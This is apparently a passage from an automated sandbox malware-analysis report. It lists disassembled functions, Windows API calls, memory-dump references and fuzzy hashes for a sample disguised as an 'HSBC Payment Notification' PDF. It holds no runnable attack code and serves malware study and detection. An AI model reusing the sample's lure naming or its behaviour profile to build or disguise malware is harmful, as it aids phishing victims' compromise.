                                                                                                                                                    • Instruction Fuzzy Hash: 38314FB2D00108AFCB00EFA6C8819EFB7F9EF84304F00446EE515E7242EA759E058BA5
                                                                                                                                                    Function 0048C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0048C4D2
                                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0043B9AB,?,?,?,?,?), ref: 0048C4E7
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0048C534
                                                                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0043B9AB,?,?,?), ref: 0048C56E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2864067406-0
                                                                                                                                                    • Opcode ID: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                                                                                                                                                    • Instruction ID: 2973952025af683afbaf652597196eb0b77ee17814688135882e4792ee887bd6
                                                                                                                                                    • Opcode Fuzzy Hash: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                                                                                                                                                    • Instruction Fuzzy Hash: CE319335500028FFCF159F58C898EAF7BB5EB09310F44486AF9059B361C735AD50DBA8
                                                                                                                                                    Function 00458656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                                                                                                                                                      • Part of subcall function 0045810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                                                                                                                                                      • Part of subcall function 0045810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                                                                                                                                                      • Part of subcall function 0045810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                                                                                                                                                      • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004586A3
                                                                                                                                                    • _memcmp.LIBCMT ref: 004586C6
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004586FC
                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00458703
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1592001646-0
                                                                                                                                                    • Opcode ID: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                                                                                                                                                    • Instruction ID: 730e04a0c9a28b219d77ec22e6a84493cb1498a8cd35620125a6bebab32f77ad
                                                                                                                                                    • Opcode Fuzzy Hash: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                                                                                                                                                    • Instruction Fuzzy Hash: E4215A71E01109EBDB10DFA4C989BAEB7B8EF45306F15405EE844AB242DB34AE09CB58
                                                                                                                                                    Function 0042098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __setmode.LIBCMT ref: 004209AE
                                                                                                                                                      • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                                                                                                                                      • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                                                                                                                                    • _fprintf.LIBCMT ref: 004209E5
                                                                                                                                                    • OutputDebugStringW.KERNEL32(?), ref: 00455DBB
                                                                                                                                                      • Part of subcall function 00424AAA: _flsall.LIBCMT ref: 00424AC3
                                                                                                                                                    • __setmode.LIBCMT ref: 00420A1A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 521402451-0
                                                                                                                                                    • Opcode ID: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                                                                                                                                                    • Instruction ID: 506474fa098cb1490a8c63a0929ef03edd2b6c88ff5c0dc42923ee6bdce5b67a
                                                                                                                                                    • Opcode Fuzzy Hash: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                                                                                                                                                    • Instruction Fuzzy Hash: E31126727041146FDB04B2A5BC469BE77A8DF81318FA0416FF105632C3EE3C5946879D
                                                                                                                                                    Function 004350E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 00435101
                                                                                                                                                      • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                                                                                      • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                                                                                      • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00A60000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 614378929-0
                                                                                                                                                    • Opcode ID: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                                                                                                                                                    • Instruction ID: 565aca9384bc55ec46628ce6f4316e74187f5c3bb682111b66b5609c454c8c26
                                                                                                                                                    • Opcode Fuzzy Hash: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                                                                                                                                                    • Instruction Fuzzy Hash: D411E072E01A21AECF313FB1BC05B5E3B989B183A5F50593FF9049A250DE3C89418B9C
                                                                                                                                                    Function 004044A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 004044CF
                                                                                                                                                      • Part of subcall function 0040407C: _memset.LIBCMT ref: 004040FC
                                                                                                                                                      • Part of subcall function 0040407C: _wcscpy.LIBCMT ref: 00404150
                                                                                                                                                      • Part of subcall function 0040407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                                                                                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 00404524
                                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00404533
                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0043D4B9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1378193009-0
                                                                                                                                                    • Opcode ID: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                                                                                                                                                    • Instruction ID: dcb2c65cf3c1a774e1d203f737fabc32089307ed9affa8f53aec521d9447171b
                                                                                                                                                    • Opcode Fuzzy Hash: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                                                                                                                                                    • Instruction Fuzzy Hash: 6F21FBB0904754AFE7328B249C45BEBBBEC9B55318F0404AFE79A56281C3782984CB49
                                                                                                                                                    Function 00476369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                                                                                                                                      • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                                                                                                                                    • gethostbyname.WSOCK32(?), ref: 00476399
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 004763A4
                                                                                                                                                    • _memmove.LIBCMT ref: 004763D1
                                                                                                                                                    • inet_ntoa.WSOCK32(?), ref: 004763DC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1504782959-0
                                                                                                                                                    • Opcode ID: ebe779451b8fe17377772976d37213f5a324d7049d93d61360c19b924476f115
                                                                                                                                                    • Instruction ID: c304d0e6e06ed5b692ae79d4b0fe9c52f6c8e6d6f1456e813eafe14ad56adccd
                                                                                                                                                    • Opcode Fuzzy Hash: ebe779451b8fe17377772976d37213f5a324d7049d93d61360c19b924476f115
                                                                                                                                                    • Instruction Fuzzy Hash: F2114F71600109AFCB00FBA5D946CEE77B9EF04314B54847AF505B72A2DB389E14CB69
                                                                                                                                                    Function 00458B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00458B61
                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B73
                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B89
                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458BA4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                    • Opcode ID: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                                                                                                                                    • Instruction ID: 6d6e4feeaee75d02a1ec4dd614e497ad2765f264ac6e3ed00c825e9843e5ba14
                                                                                                                                                    • Opcode Fuzzy Hash: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                                                                                                                                    • Instruction Fuzzy Hash: 56113A79900218BFDB10DB95C884EAEBB78EB48710F2041A6E900B7250DA716E15DB94
                                                                                                                                                    Function 00401290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                    • DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0043B5FB
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0043B605
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0043B610
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4127811313-0
                                                                                                                                                    • Opcode ID: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                                                                                                                                                    • Instruction ID: ee9d34d9398b5f91fab5137b757b2ab9dbcc007e8162b1c14587a54292e2d527
                                                                                                                                                    • Opcode Fuzzy Hash: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                                                                                                                                                    • Instruction Fuzzy Hash: 39112B39510059FBCB00EF99D8899AE77B8FB05300F4008AAF901F7291D734BA569BA9
                                                                                                                                                    Function 00436FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3016257755-0
                                                                                                                                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                                    • Instruction ID: 3d94be51af7e819a6a5def82be0e086b27bd99855e7e965629bee2c507946819
                                                                                                                                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                                    • Instruction Fuzzy Hash: 78014EB244414ABBCF2A5E84CC41CEE3F72BB1C354F599416FA9858131D23AD9B1AB85
                                                                                                                                                    Function 0048B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0048B2E4
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0048B2FC
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0048B320
                                                                                                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048B33B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 357397906-0
                                                                                                                                                    • Opcode ID: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                                                                                                                    • Instruction ID: e0f35f64d62337ec24ef524e52db7040af9c6cc02db1932b8591958b9ea84988
                                                                                                                                                    • Opcode Fuzzy Hash: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                                                                                                                    • Instruction Fuzzy Hash: B9117775D00209EFDB01DF99C444AEEBBF5FF18310F104566E914E3220D735AA558F94
                                                                                                                                                    Function 00466BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00466BE6
                                                                                                                                                      • Part of subcall function 004676C4: _memset.LIBCMT ref: 004676F9
                                                                                                                                                    • _memmove.LIBCMT ref: 00466C09
                                                                                                                                                    • _memset.LIBCMT ref: 00466C16
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00466C26
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 48991266-0
                                                                                                                                                    • Opcode ID: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                                                                                                                                                    • Instruction ID: 06c116e41b1fbc97defe022da98efa456519ca017efd3746de7cd937a477406a
                                                                                                                                                    • Opcode Fuzzy Hash: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                                                                                                                                                    • Instruction Fuzzy Hash: ACF0547A200110BBCF016F56EC85A8ABF29EF45325F4480A9FE085E227D775E811CBB9
                                                                                                                                                    Function 00402218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColor.USER32(00000008), ref: 00402231
                                                                                                                                                    • SetTextColor.GDI32(?,000000FF), ref: 0040223B
                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00402250
                                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 00402258
                                                                                                                                                    • GetWindowDC.USER32(?,00000000), ref: 0043BE83
                                                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0043BE90
                                                                                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0043BEA9
                                                                                                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0043BEC2
                                                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0043BEE2
                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0043BEED
                                                                                                                                                    Memory Dump Source
